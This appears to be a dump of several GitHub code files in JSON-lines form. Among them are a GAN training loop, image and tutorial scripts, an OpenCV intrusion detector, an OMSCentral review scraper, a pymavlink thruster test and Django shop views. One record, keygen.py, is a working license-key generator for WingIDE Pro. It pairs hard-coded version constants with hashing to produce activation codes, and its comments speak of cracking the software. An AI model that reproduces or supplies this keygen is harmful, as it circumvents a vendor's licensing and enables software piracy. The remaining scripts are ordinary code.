real_data = data[0].to(device)\n\n b_size = real_cpu.size(0)\n label = torch.full((b_size,256,256), real_label, dtype=torch.float, device=device)\n\n # Forward pass real batch through D\n output = netD(real_cpu, real_data).view(b_size,256,256)\n\n ## add mask\n mask = data[2].to(device)\n # output = torch.clamp(output + mask, max=1) # no need for true label (since all is 1)\n\n # Calculate loss on all-real batch\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errD_real = torch.mean(summed_by_img/non_zero)\n\n errD_real = criterion(output, label, mask)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n # noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n \n fake = netG(real_data)\n label.fill_(fake_label)\n\n # Classify all fake batch with D\n output = netD(fake.detach(), real_data).view(b_size,256,256)\n\n # Calculate D's loss on the all-fake batch\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errD_fake = torch.mean(summed_by_img/non_zero)\n\n errD_fake = criterion(output, label, mask)\n\n # Calculate the gradients for this batch, accumulated (summed) with previous gradients\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Compute error of D as sum over the fake and the real batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n \n # add mask to labels\n # label = torch.clamp(label + mask, max=1) # no need all is already 1\n\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake, real_data).view(b_size,256,256)\n\n # Calculate G's loss based on this output\n errG = criterion(output, label, mask)\n\n # error = nn.functional.binary_cross_entropy(label, output, weight=mask, reduction='none')\n # summed_by_img = torch.sum(error, dim=(1,2))\n # non_zero = torch.count_nonzero(mask, (1,2))\n # errG = torch.mean(summed_by_img/non_zero)\n\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(train_dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs-1) and (i == len(train_dataloader)-1)):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n #PLOT\n plt.figure(figsize=(10,5))\n plt.title(\"Generator and Discriminator Loss During Training\")\n plt.plot(G_losses,label=\"G\")\n plt.plot(D_losses,label=\"D\")\n plt.xlabel(\"iterations\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.savefig(os.path.join(output_dir, 'losses'))\n plt.show()\n\n for i in range(len(img_list)):\n fig = plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.imshow(np.transpose(img_list[i],(1,2,0)))\n plt.title(\"Generated Albedo\")\n plt.savefig(os.path.join(output_dir, 'gen-albedo-{}'.format(i)))\n plt.show()\n\n\n ex = real_batch[1]\n plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.title(\"Original Shadeless Images\")\n plt.imshow(np.transpose(vutils.make_grid(ex, padding=2, normalize=True).cpu(),(1,2,0)))\n plt.savefig(os.path.join(output_dir, 'original-albedo'))\n\n # Plot some training images\n ex = real_batch[0]\n plt.figure(figsize=(8,8))\n plt.axis(\"off\")\n plt.title(\"Original Rendered Images\")\n plt.imshow(np.transpose(vutils.make_grid(ex, padding=2, normalize=True).cpu(),(1,2,0)))\n plt.savefig(os.path.join(output_dir, 'rendered'))","repo_name":"giuseppefrn/PixelwiseColourSpecification","sub_path":"siamese-pixelwise.py","file_name":"siamese-pixelwise.py","file_ext":"py","file_size_in_byte":13043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566185955","text":"#!/usr/bin/env python3\nimport argparse\nfrom textwrap import dedent\n\np = parser = argparse.ArgumentParser(description=dedent('''\n Create an image for whatsapp\n ''').strip('\\n'))\n\np.add_argument(\"files\", nargs='+')\np.add_argument(\"--out\", \"-o\", nargs='+')\np.add_argument(\"-b\", '--background', default=None)\np.add_argument(\"-v\", \"--verbose\", action='store_true')\n\nargs = parser.parse_args()\n\ndef parse_color(string):\n \"\"\"\n >>> parse_color('#ffcc99') == (0xff, 0xcc, 0x99)\n True\n \"\"\"\n assert string.startswith('#')\n assert len(string) in (6+1, 8+1)\n return tuple(int(string[1+i:1+i+2], base=16)\n for i in range(len(string) // 2))\n\ndef new_name(x):\n import os\n from itertools import count, filterfalse\n splitext = os.path.splitext\n a,b = splitext(x)\n\n def first_not_exists(x):\n return next(filterfalse(os.path.exists, x))\n\n return first_not_exists('{}__{}{}'.format(a, i, b)\n for i in count(1))\n\nif args.out:\n assert len(args.files) == len(args.out)\nelse:\n args.out = list(map(new_name, args.files))\n\n\nfrom PIL import Image\nfor filename, out_filename in zip(args.files, args.out):\n im = Image.open(filename)\n bcolor = im.getpixel((0,0)) if not args.background else parse_color(args.background)\n real_background_color = bcolor[:len(im.mode)]\n out = Image.new(im.mode, (max(im.size), max(im.size)), real_background_color)\n position = ((im.size[0] // 2, 0) if im.size[0] < im.size[1] else \n (0, im.size[1] // 2))\n out.paste(im, position)\n out.save(out_filename)\n\n if args.verbose:\n print('Created', out_filename)\n\n","repo_name":"robertvandeneynde/python","sub_path":"whatsappify.py","file_name":"whatsappify.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"12840129856","text":"import os\nimport string\nimport random\nimport hashlib\nimport platform\npy_version = platform.python_version()\nif py_version[0] != '3':\n print(\"Can't run under python2 env ! please run tool under python 3.2 or later version !\")\n os.system(\"pause\")\n os._exit(0)\n# GUI Import\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n \nBASE16 = '0123456789ABCDEF'\nBASE30 = '123456789ABCDEFGHJKLMNPQRTVWXY'\n \n \ndef RandomString(size=20, chars=string.ascii_uppercase + string.digits):\n return ''.join((random.choice(chars) for _ in range(size)))\n \n \ndef BaseConvert(number, fromdigits, todigits, ignore_negative=True):\n if not ignore_negative and str(number)[0] == '-':\n number = str(number)[1:]\n neg = 1\n else:\n neg = 0\n x = 0\n for digit in str(number):\n x = x * len(fromdigits) + fromdigits.index(digit)\n \n res = ''\n while x > 0:\n digit = x % len(todigits)\n res = todigits[digit] + res\n x //= len(todigits)\n \n if neg:\n res = '-' + res\n return res\n \n \ndef AddHyphens(code):\n return code[:5] + '-' + code[5:10] + '-' + code[10:15] + '-' + code[15:]\n \n \ndef SHAToBase30(digest):\n tdigest = ''.join([c for i, c in enumerate(digest) if i // 2 * 2 == i])\n result = BaseConvert(tdigest, BASE16, BASE30)\n while len(result) < 17:\n result = '1' + result\n return result\n \n \ndef loop(ecx, lichash):\n part = 0\n for c in lichash:\n part = ecx * part + ord(c) & 1048575\n return part\n \ng_version_list = ('9.0.4','8.X.X', '7.X.X', '6.X.X', '5.X.X')\ng_version_magics = {\n '5.X.X': [7, 123, 23, 87],\n '6.X.X': [23, 161, 47, 9],\n '7.X.X': [221, 13, 93, 27],\n '8.X.X': [179, 95, 45, 245],\n '9.0.4': [123, 17, 42, 7],\n}\n \n \ndef CalcActivationCode(args):\n if not isinstance(args, Application):\n return\n # # Generate License ID\n # licenseID = AddHyphens('CN' + RandomString(18, '123456789ABCDEFGHJKLMNPQRTVWXY'))\n licenseID = args.LicID.get()\n print ('License id: ' + licenseID)\n \n #requestCode = input('Enter request code:')\n requestCode = args.ReqCode.get()\n if requestCode.strip() == '':\n messagebox.showerror(\"Hints\", \"Please input the Request Code !\")\n return \n # # SHA1\n shaHasher = hashlib.sha1()\n shaHasher.update(requestCode.encode('utf-8'))\n shaHasher.update(licenseID.encode('utf-8'))\n hashResult = shaHasher.hexdigest().upper()\n lichash = AddHyphens(requestCode[:3] + SHAToBase30(hashResult))\n \n versionMagic = None\n # Supported crack WingIDE Pro version list : 5.x.x, 6.x.x, 7.x.x\n wingIDEProVerStr = args.VersionInfo.get()\n print ('Cracking WingIDE Version : ' + wingIDEProVerStr)\n if wingIDEProVerStr in g_version_magics.keys():\n versionMagic = g_version_magics[wingIDEProVerStr]\n if versionMagic:\n activationCode = format(loop(versionMagic[0], lichash), '05x') + \\\n format(loop(versionMagic[1], lichash), '05x') + \\\n format(loop(versionMagic[2], lichash), '05x') + \\\n format(loop(versionMagic[3], lichash), '05x')\n pass\n else:\n print('Get wrong WingIDE version, exit...')\n os._exit(0)\n activationCode = BaseConvert(activationCode.upper(), BASE16, BASE30)\n while len(activationCode) < 17:\n activationCode = '1' + activationCode\n \n activationCode = AddHyphens('AXX' + activationCode)\n print ('Activation code: ' + activationCode)\n args.ActCode.set(activationCode)\n pass\n \n \nclass Application(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.master.title('WingIDE Pro Keygen(5, 6, 7)')\n self.master.geometry('350x180')\n self.create_widgets()\n pass\n \n def create_widgets(self):\n current_row = 0\n current_col = 0\n \n # Version Info\n self.l0 = Label(self.master, text='WingIDE Pro :')\n self.l0.grid(padx=5, pady=5, row=current_row, column=current_col)\n self.VersionInfo = StringVar()\n self.versionComb = ttk.Combobox(self.master, textvariable=self.VersionInfo, state='readonly')\n self.versionComb['values'] = g_version_list\n self.versionComb.grid(padx=5, pady=1, row=current_row, column=current_col + 1)\n self.versionComb.current(0)\n current_row += 1\n \n # License ID info\n self.l1 = Label(self.master, text='LicenseID:')\n self.l1.grid(padx=5, pady=5, row=current_row, column=current_col)\n self.LicID = StringVar()\n self.LicEntry = Entry(self.master, textvariable=self.LicID, width=30, state='readonly')\n self.LicEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\n self.LicID.set(AddHyphens('CN' + RandomString(18, '123456789ABCDEFGHJKLMNPQRTVWXY')))\n current_row += 1\n \n # Request code info\n self.l2 = Label(self.master, text='RequestCode:')\n self.l2.grid(padx=5, pady=5, row=current_row, column=current_col)\n self.ReqCode = StringVar()\n self.ReqcodeEntry = Entry(self.master, textvariable=self.ReqCode, width=30)\n self.ReqcodeEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\n current_row += 1\n \n # Activation code info\n self.l3 = Label(self.master, text=b'ActivationCode:')\n self.l3.grid(padx=5, pady=5, row=current_row, column=current_col)\n self.ActCode = StringVar()\n self.ReqcodeEntry = Entry(self.master, textvariable=self.ActCode, width=30, state='readonly')\n self.ReqcodeEntry.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\n current_row += 1\n \n self.btn_Calc = Button(self.master)\n self.btn_Calc['text'] = 'Generate'\n self.btn_Calc['command'] = lambda: CalcActivationCode(self)\n self.btn_Calc.grid(padx=5, pady=5, row=current_row, column=current_col + 1)\n pass\n \n \nif __name__ == '__main__':\n root = Tk()\n #\n app = Application(master=root)\n app.mainloop()\n","repo_name":"sfc9982/WingProKeygen","sub_path":"keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20711995214","text":"import random\r\n#List comprehension - create new list from current list\r\n #would currently do this via loop and list.append()\r\n\r\n#list comprehension pseudo code below\r\n#new_list = [new_item for item in list]\r\nimport random\r\n\r\nimport pandas\r\n\r\nnumbers = [1, 2, 3]\r\nnew_list = []\r\nfor n in numbers:\r\n add_1 = n + 1\r\n new_list.append(add_1)\r\n\r\n#instead w/ list comprehension -\r\n\r\nnew_list2 = [n+1 for n in numbers]\r\n#new_list = [new_item for item in list] ^\r\nprint(new_list2)\r\n\r\nname = \"gravytas\"\r\nletter_list = [x for x in name]\r\nprint(letter_list)\r\n\r\nnumber_list = [x*2 for x in range(1,5)]\r\nprint(number_list)\r\n\r\n#conditional list comprehension\r\n#new_list = [new_item for item in list if test]\r\n\r\nnames = [\"Alex\", \"Beth\", \"Caroline\", \"Dave\", \"Eleanor\", \"Freddie\"]\r\nshort_names = [x for x in names if len(x)<5]\r\nprint(short_names)\r\n\r\nlong_names = [name.upper() for name in names if len(name)>4]\r\nprint(long_names)\r\n\r\n#PRACTICE WITH LIST COMPREHENSION\r\n#Exercise 1 - square each number in numbers2 list\r\nnumbers2 = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\r\nsquared_nums = [num**2 for num in numbers2]\r\nprint(squared_nums)\r\n\r\n#Exercise 2 - create new list with only even numbers from numbers2\r\nevens = [num for num in numbers2 if num%2==0]\r\nprint(evens)\r\n\r\n#Exercise 3 - pull numbers from file1.txt and file2.txt and dedupe into one list\r\nwith open(\"./Scripts/file1.txt\") as file1:\r\n data1 = file1.readlines()\r\n data1_list = [x.strip() for x in data1]\r\n print(data1_list)\r\n\r\nwith open(\"./Scripts/file2.txt\") as file2:\r\n data2 = file2.readlines()\r\n data2_list = [x.strip() for x in data2]\r\n print(data2_list)\r\n\r\nduplicates = [int(x) for x in data1_list if x in data2_list]\r\nprint(duplicates)\r\n\r\n###Dictionary comprehension\r\n# new_dict = {new_key:new_value for item in list}\r\n# new_dict2 = {new_key:new_value for (key, value) in dict.items()}\r\n# new_dict3 = {new_key:new_value for (key, value) in dict.items() if test}\r\n\r\nname = {'Tom', 'Beth', 'Chloe', 'Jake', 'James'}\r\nstudent_scores = {student:random.randint(1,100) for student in name}\r\nprint(student_scores)\r\n\r\n#pull students with grade over 60 from created dict above\r\npassed_students = {student:score for (student,score) in student_scores.items() if score>=60}\r\nprint(passed_students)\r\n\r\n#practice with dictionary compression; count number of letters in each word and create dictionary\r\n\r\nimport re\r\nsentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\r\nwordList = re.sub(\"[^\\w]\", \" \", sentence).split()\r\n\r\nresult = {word:len(word) for word in wordList}\r\nprint(result)\r\n\r\n#take each temp in celsius and convert to farenheit\r\nweather_c = {\r\n \"monday\": 12,\r\n \"tuesday\": 14,\r\n \"wednesday\": 15,\r\n \"thursday\": 14,\r\n \"friday\": 21,\r\n \"saturday\": 22,\r\n \"sunday\": 24\r\n}\r\nweather_f = {day:round((temp * (9/5) +32),1) for (day,temp) in weather_c.items()}\r\nprint(weather_f)\r\n\r\nstudent_dict = {\r\n \"student\": [\"Angela\", \"James\", \"Lilly\"],\r\n \"score\": [56, 76, 99]\r\n}\r\n\r\nfor (key, value) in student_dict.items():\r\n print(key)\r\n print(value)\r\n\r\nimport pandas\r\nstudent_dataframe = pandas.DataFrame(student_dict)\r\nprint(student_dataframe)\r\n\r\n#loop through data frame\r\nfor (key,value) in student_dataframe.items():\r\n print(value)\r\n\r\n#loop through rows of dataframe\r\nfor (index, row) in student_dataframe.iterrows():\r\n print(row.student)\r\n print(row.score)\r\n if row.student == \"Angela\":\r\n print(row.score)\r\n\r\n\r\n\r\n#Challenge\r\n#1 create a dictionary in this format: {\"A\":\"alpha\", \"B\":\"bravo\", ...}\r\ndata5 = pandas.read_csv(\"phonetic.csv\")\r\nphon_dict = {row.Letter:row.Word for (index,row) in data5.iterrows()}\r\n\r\n#2 create a list of the phonetic words used for a given words\r\nword = input(\"Choose a word to create a code: \").upper()\r\ncode_output = [phon_dict[letter] for letter in word]\r\nprint(code_output)","repo_name":"gravytas/python-bootcamp","sub_path":"Python Bootcamp Day 0026_List Comprehension and Phonetic Alphabet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11067040674","text":"import os\r\nimport sys\r\nimport uuid\r\nimport cv2\r\nfrom cv2 import getStructuringElement\r\n\r\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\r\nrecognizer.read('D:/test/face_trainer/trainer.yml')\r\n\r\ndef imageClassification(video_path, names):\r\n # 判断是否有入侵行为,如果有则生成视频\r\n invade = False\r\n isHaveMovingObject = False # 检测是否有移动物体\r\n # 模型路径 需要下载模型文件\r\n model_bin = \"D:/ssd/MobileNetSSD_deploy.caffemodel\"\r\n config_text = \"D:/ssd/MobileNetSSD_deploy.prototxt\"\r\n\r\n # 类别信息\r\n objName = [\"background\",\r\n \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\r\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\",\r\n \"cow\", \"diningtable\", \"dog\", \"horse\",\r\n \"motorbike\", \"person\", \"pottedplant\",\r\n \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n # 加载模型\r\n net = cv2.dnn.readNetFromCaffe(config_text, model_bin)\r\n #使用opencv预置人脸检测的模型\r\n face_classifier = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n cap = cv2.VideoCapture(video_path)#\"D:/example video.avi\"\r\n fgbg = cv2.createBackgroundSubtractorMOG2()\r\n kernel = getStructuringElement(cv2.MORPH_RECT, (3, 3), (-1, -1))\r\n # 视频打开失败\r\n if not cap.isOpened():\r\n print(\"Could not open video\")\r\n sys.exit()\r\n\r\n vw = cap.get(cv2.CAP_PROP_FRAME_WIDTH) #宽度\r\n vh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) #高度\r\n fps = cap.get(cv2.CAP_PROP_FPS) #帧率\r\n\r\n fileName = \"D:/test/video\" + str(uuid.uuid4()) + \".mp4\" #视频保存文件名\r\n out = cv2.VideoWriter(fileName, cv2.CAP_ANY, int(cap.get(cv2.CAP_PROP_FOURCC)), fps, (int(vw), int(vh)), True) #保存视频\r\n while True:\r\n ret, image = cap.read() #读取视频的一帧\r\n\r\n # 视频读取失败\r\n if not ret:\r\n print('Cannot read video file')\r\n sys.exit()\r\n\r\n (h, w) = image.shape[:2]\r\n # 将原图画转换为灰阶图像\r\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\r\n\r\n fgmask = fgbg.apply(image)\r\n dilate = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)\r\n cnts, hierarchy = cv2.findContours(dilate.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]\r\n\r\n for c in cnts:\r\n if isHaveMovingObject:\r\n break\r\n (x, y, w, h) = cv2.boundingRect(c) # 计算轮廓线的外框\r\n if cv2.contourArea(c) < 2000: # 计算轮廓面积\r\n continue\r\n elif w<30 or h<30:\r\n continue\r\n isHaveMovingObject = True\r\n\r\n # 如果有移动物体则进行目标检测\r\n if isHaveMovingObject:\r\n blobImage = cv2.dnn.blobFromImage(image, 0.007843, (300, 300), (127.5, 127.5, 127.5), True, False)\r\n net.setInput(blobImage)\r\n cvOut = net.forward()\r\n\r\n for detection in cvOut[0, 0, :, :]:\r\n score = float(detection[2])\r\n objIndex = int(detection[1])\r\n if score > 0.6:\r\n left = detection[3]*w\r\n top = detection[4]*h\r\n right = detection[5]*w\r\n bottom = detection[6]*h\r\n\r\n # 绘制\r\n cv2.rectangle(image, (int(left), int(top)), (int(right), int(bottom)), (0, 0, 255), thickness=2)\r\n cv2.putText(image, \"score:%.2f, %s\"%(score, objName[objIndex]),\r\n (int(left) - 10, int(top) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2, 8)\r\n invade = True\r\n\r\n # 人脸识别\r\n face = face_classifier.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=2, minSize=(24, 24))\r\n for (x, y, w, h) in face:\r\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n idnum, confidence = recognizer.predict(gray[y:y + h, x:x + w])\r\n if confidence < 68: #如果置信度小于68则说明该人有很大可能是本人\r\n name = names[idnum]\r\n print(idnum)\r\n confidence = \"{0}%\".format(round(100 - confidence))\r\n else:\r\n name = \"unknown\"\r\n print(confidence)\r\n print(idnum)\r\n confidence = \"{0}%\".format(round(100 - confidence))\r\n\r\n cv2.putText(image, name, (x + 5, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\r\n cv2.putText(image, str(confidence), (x + 5, y + h - 5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\r\n\r\n # 如果有人入侵则录制视频\r\n if invade:\r\n out.write(image)\r\n # 显示\r\n cv2.imshow('demo', image)\r\n\r\n k = cv2.waitKey(100)& 0xff\r\n # 27对应Esc,当点击该键时退出\r\n if k == 27:\r\n break\r\n elif k == 32:\r\n while cv2.waitKey(0) != 32:\r\n cv2.waitKey(0)\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n#获取名字\r\ndef findName(path):\r\n imagePaths = [os.path.join(path, f) for f in os.listdir(path)] # 读取照片素材所有文件路径\r\n names = []\r\n for imagePath in imagePaths:\r\n name = os.path.split(imagePath)[-1].split(\"#\")[1]\r\n if name in names:\r\n continue\r\n else:\r\n names.append(name)\r\n #names.reverse()\r\n return names\r\n\r\n\r\nif __name__ == '__main__':\r\n path = 'D:/test/face'\r\n print(findName(path))\r\n names = findName(path)\r\n video_path = 0#\"E:/demo.mp4\"#\"D:/example video.avi\"#\"D:/test2.mp4\"\r\n imageClassification(video_path, names)\r\n","repo_name":"106teamChangZihan/Monitor-System","sub_path":"intrusionDetection.py","file_name":"intrusionDetection.py","file_ext":"py","file_size_in_byte":5686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36603893938","text":"# libraries for webscraping, parsing and getting data\nfrom urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\nimport json\n\n# for plotting and data manipulation\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly\nimport plotly.express as px\n\n# for getting current date and time to print 'last updated' in webpage\nfrom datetime import datetime\n\n# Filter data with minimum review count of 5\nmin_review_count = 5\n\n# Scrape the Course Reviews Data from OMS Central\nurl = 'https://www.omscentral.com/'\n\nreq = Request(url=url,headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0'})\n\ntry:\n response = urlopen(req) \nexcept:\n time.sleep(10) # if there is an error and request is blocked, do it more slowly by waiting for 10 seconds before requesting again\n response = urlopen(req) \n \n# Read the contents of the file into 'html'\nhtml = BeautifulSoup(response)\n\n# Parse the Course Reviews Data into a Python List\n# Find the data in between the final \"\n description = \"The data is pulled from OMSCentral daily via a GitHub Actions script to update the summary information in this page.

\"\n credits = \"Credits to OMSCentral for the information, review and rating of the courses. I do not own any of this data.\"\n subtitle = \"

Explanation and Source Code

\"\n code = \"\"\"Explanatory Article | Source Code\"\"\"\n author = \"\"\" | Created by Damian Boh, check out my GitHub Page

\"Buy\"\"\"\n f.write(title + updated + current_time + description + credits + subtitle + code + author)\n f.write(fig_scatter1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n f.write(fig_scatter2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n f.write(fig_treemap1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n f.write(fig_treemap2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n \n # if below lines are uncommmented, remember to uncomment the lines above that creates these plots\n # f.write(fig_hist1.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n # f.write(fig_hist2.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n # f.write(fig_hist3.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n \n f.write(fig_corr.to_html(full_html=False, include_plotlyjs='cdn')) # write the fig created above into the html file\n","repo_name":"damianboh/gatech_omscs_live_rating_reviews_plot","sub_path":"update_page_no_semester.py","file_name":"update_page_no_semester.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"35100904748","text":"# Import mavutil\nfrom pymavlink import mavutil\nimport time\n\ntime.sleep(10)\n\n# connection olusturma\nmaster = mavutil.mavlink_connection(\n '/dev/ttyACM0',\n baud=115200)# Raspberry pi ile pixhawk'ın iletişim kurabilmesi için\n\nmaster.wait_heartbeat()\nmode = 'MANUAL'\n\nmode_id = master.mode_mapping()[mode]\n\nmaster.set_mode(mode_id)\n\nmaster.arducopter_arm()\ngit =0\nwhile(True):\n git += 1\n if(5000 > git):\n master.mav.manual_control_send(\n master.target_system,\n master.component,\n mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,\n 0,\n 0,\n -500,\n 0,\n 0)\n print(git)\n elif(git > 5000):\n master.arducopter_disarm()\n\n","repo_name":"KtunYazgit/Barbarov","sub_path":"Software/2021Pixhawk/jetsonnano2.py","file_name":"jetsonnano2.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28546754760","text":"import json\nimport os.path\nimport random\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom basketapp.models import Basket\nfrom mainapp.models import ProductCategory, Product\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.views.decorators.cache import never_cache\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.cache import cache_page\nfrom django.http import JsonResponse\n\n# Create your views here.\n\n\nJSON_PATH = 'mainapp/json'\n\n\ndef get_links_menu():\n if settings.LOW_CACHE:\n key = 'links_menu'\n links_menu = cache.get(key)\n if links_menu is None:\n links_menu = ProductCategory.objects.filter(is_active=True)\n cache.set(key, links_menu)\n return links_menu\n else:\n return ProductCategory.objects.filter(is_active=True)\n\n\ndef get_category(pk):\n if settings.LOW_CACHE:\n key = f'category_{pk}'\n category = cache.get(key)\n if category is None:\n category = get_object_or_404(ProductCategory, pk=pk)\n cache.set(key, category)\n return category\n else:\n return get_object_or_404(ProductCategory, pk=pk)\n\n\ndef get_products():\n if settings.LOW_CACHE:\n key = 'products'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(is_active=True, \\\n category__is_active=True).select_related('category')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(is_active=True, \\\n category__is_active=True).select_related('category')\n\n\ndef get_product(pk):\n if settings.LOW_CACHE:\n key = f'product_{pk}'\n product = cache.get(key)\n if product is None:\n product = get_object_or_404(Product, pk=pk)\n cache.set(key, product)\n return product\n else:\n return get_object_or_404(Product, pk=pk)\n\n\ndef get_products_orederd_by_price():\n if settings.LOW_CACHE:\n key = 'products_orederd_by_price'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(is_active=True, \\\n category__is_active=True).order_by('price')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(is_active=True, \\\n category__is_active=True).order_by('price')\n\n\ndef get_products_in_category_orederd_by_price(pk):\n if settings.LOW_CACHE:\n key = f'products_in_category_orederd_by_price_{pk}'\n products = cache.get(key)\n if products is None:\n products = Product.objects.filter(category__pk=pk, is_active=True, \\\n category__is_active=True).order_by('price')\n cache.set(key, products)\n return products\n else:\n return Product.objects.filter(category__pk=pk, is_active=True, \\\n category__is_active=True).order_by('price')\n\n\ndef load_from_json(file_name):\n with open(os.path.join(JSON_PATH, file_name + '.json'), 'r') as infile:\n return json.load(infile)\n\n\ndef get_basket(user):\n if user.is_authenticated:\n return Basket.objects.filter(user=user)\n else:\n return []\n\n\ndef get_hot_product():\n products = Product.objects.all()\n return random.sample(list(products), 1)[0]\n\n\ndef get_same_products(hot_product):\n same_products = Product.objects.filter(category=hot_product.category).exclude(pk=hot_product.pk)[:3]\n return same_products\n\n\n# links_menu = [\n# {'href': 'products_all', 'name': 'Все'},\n# {'href': 'products_home', 'name': 'Дом'},\n# {'href': 'products_office', 'name': 'Офис'},\n# {'href': 'products_modern', 'name': 'Модерн'},\n# {'href': 'products_classic', 'name': 'Классика'},\n# ]\n\nmain_menu = [\n {'menu_section': 'index', 'main_urls': 'index', 'name': 'Главная'},\n {'menu_section': 'products:index', 'main_urls': 'products', 'name': 'Продукты'},\n {'menu_section': 'contact', 'main_urls': 'contact', 'name': 'Контакты'},\n]\n\nmodule_dir = os.path.dirname(__file__)\n\n\ndef index(request):\n products = (Product.objects.all().select_related('category')[:3])\n content = {\n 'title': 'Главная',\n 'main_menu': main_menu,\n 'products': products,\n\n }\n return render(request, 'mainapp/index.html', content)\n\n\ndef products(request, pk=None, page=1):\n title = 'Продукты'\n\n # links_menu = ProductCategory.objects.all()\n links_menu = ProductCategory.objects.filter(is_active=True)\n basket = get_basket(request.user)\n\n # basket = []\n # if request.user.is_authenticated:\n # basket = Basket.objects.filter(user=request.user)\n\n if pk is not None:\n if pk == 0:\n category = {\n 'pk': 0,\n 'name': 'все'\n }\n # products = Product.objects.all().order_by('price')\n products = Product.objects.filter(is_active=True, category__is_active=True).order_by('price')\n else:\n category = get_object_or_404(ProductCategory, pk=pk)\n # products = Product.objects.filter(category__pk=pk).order_by('price')\n products = Product.objects.filter(category__pk=pk, is_active=True, category__is_active=True).order_by(\n 'price')\n\n paginator = Paginator(products, 2)\n try:\n products_paginator = paginator.page(page)\n except PageNotAnInteger:\n products_paginator = paginator.page(1)\n except EmptyPage:\n products_paginator = 